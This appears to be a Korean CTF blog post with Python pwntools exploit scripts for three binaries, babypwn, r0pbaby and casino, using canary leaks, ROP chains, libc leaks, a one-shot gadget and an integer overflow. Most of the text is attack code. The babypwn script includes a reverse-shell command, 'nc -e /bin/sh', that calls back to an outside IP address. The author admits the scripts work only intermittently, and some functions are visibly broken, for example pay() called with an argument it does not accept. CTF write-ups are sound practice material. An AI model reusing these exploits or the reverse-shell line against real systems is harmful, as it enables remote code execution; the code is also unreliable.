Babypwn, r0pbaby, casino

from pwn import *

context(arch='i386', os='linux', endian='little')

def leak_canary():

p = remote("localhost", 8181)

print p.recvuntil('>')

pay = "A"*40

p.send("1\n")

print p.recvuntil(": ")

p.send(pay+"\n")

p.recvuntil(pay)

canary = u32(p.recv(4)[0:]) - 10

p.close()

return canary

def pay():

shell="nc.traditional -e /bin/sh 108.61.161.168 4444"

elf = ELF("./babypwn")

rop = ROP(elf)

pay = "A"*40 + p32(canary) + "A"* 12 

rop.recv(0x4,elf.bss(),len(shell)+1,0x0)

rop.system(elf.bss())

pay += rop.chain()

return pay

def exploit(pay):

p = remote("localhost",8181)

p.send("1\n")

p.send(pay+"\n")

p.send("3\n")

p.send(shell)

p.close()

if __name__=='__main__':

canary = leak_canary()

print "[+]Canary : 0x%x" % canary

pay = pay(canary)

print "[+]Payload : %s" % pay

print "----------Attack----------"

exploit(pay)

단순 canary leak, rop 

from pwn import *

def exploit(pay):

p.sendline("3")

p.sendline("32")

p.send(pay)

p.sendline("4")

p.interactive()

def payload(leak):

pay = "A"*8

pay += p64(int(leak['poprdi'],16)) + p64(int(leak['binsh'],16)) + p64(int(leak['system'],16))

return pay

def leak():

libc=dict()

libc['system']='0x45390'

libc['poprdi']='0x21102'

libc['binsh']='0x14721b'

leak = dict()

p.recvuntil(":")

p.send("1\n")

p.recvuntil("libc.so.6: ")

libc_so = p.recv(18)[0:]

leak['libc'] = libc_so

p.send("2\n")

p.recvuntil("Enter symbol: ")

p.sendline("system")

p.recvuntil("Symbol system: ")

system = p.recv(18)[0:]

leak['system'] = system

leak['poprdi'] = str(int(leak['system'],16) - ( int(libc['system'],16) - int(libc['poprdi'],16) ))

leak['binsh'] = str(int(leak['system'],16) + int(libc['binsh'],16))

return leak

if __name__=='__main__':

with remote("???.???.???.???", 9999) as p:

leak = leak()

print "[+]Libc address : %s" % leak['libc']

print "[+]System address : %s" % leak['system']

print "[+]Poprdi address : %s" % hex(int(leak['poprdi']))

print "[+]Binsh address : %s" % hex(int(leak['binsh']))

payload = payload(leak)

exploit(payload)

여러모로 코딩스타일 바꾸면서 짜본 r0pbaby 

dict 쓰는데 생각보다 짜증남 ㅠㅠ 그래도 깔끔하니 앞으로는 이렇게 짜야지

64bit rop, leak....?

from pwn import *

def canary():

pay = "A"*40

p.send("3\n")

p.recv(2048)

p.sendline(pay)

p.recvuntil(pay)

cana = p.recv(8)[0:]

print "[+]Canary : 0x%x" %u64(cana)

return u64(cana)

def exploit(canary):

poprdi = 0x0000000000401083

magic_gadget = 0x0000000000046483

moveax = 0x400fee

puts_plt = 0x4008C0 

puts_got = 0x602018

libc_puts = 0x000000000006FD60

exit_got=0x6020A8

gets_plt = 0x4009A0

print p.recv(2048)

p.send("3\n")

p.recv(2048)

pay = "A"*40

pay += p64(canary)

pay += "A"*8

pay += p64(poprdi) + p64(puts_got) + p64(puts_plt) + p64(moveax)

p.sendline(pay)

p.recvuntil("A"*40)

p.recv(8)

tmp = p.recv(6)

puts_leak =  u64(tmp.ljust(8,"\x00"))

magic_gadget_leak = puts_leak - libc_puts + magic_gadget

print "[+]Magic gadget : 0x%x" % magic_gadget_leak

print p.recv(2048)

p.send("3\n")

p.recv(2048)

pay = "A"*40

pay += p64(canary) + "A"*8 + p64(poprdi) + p64(exit_got) + p64(gets_plt) + p64(moveax)

p.sendline(pay)

p.sendline(p64(magic_gadget_leak))

p.send("5\n")

p.interactive()

def int_overflow():

p.send("1\n")

p.recv(2048)

p.send("10000\n")

p.recv(2048)

p.send("1\n")

print p.recv(2048)

if __name__ == '__main__':

p = process("./casino")

print p.recv(2048)

int_overflow()

exploit(canary())

64bit rop, canary leak

으악 코드 더럽당 ㅠㅠ 첨으로 oneshot gadget으로 저격한 문제 oneshot gadget 이름 너무 좋은듯 ㅎㅎ

참고로 세개다 됬다 안됬다 하는 이상한 코드니 참고하시지 마시고 정 하셔야 한다면 어떻게 흘러가는지만 봐주세요 ㅠㅠ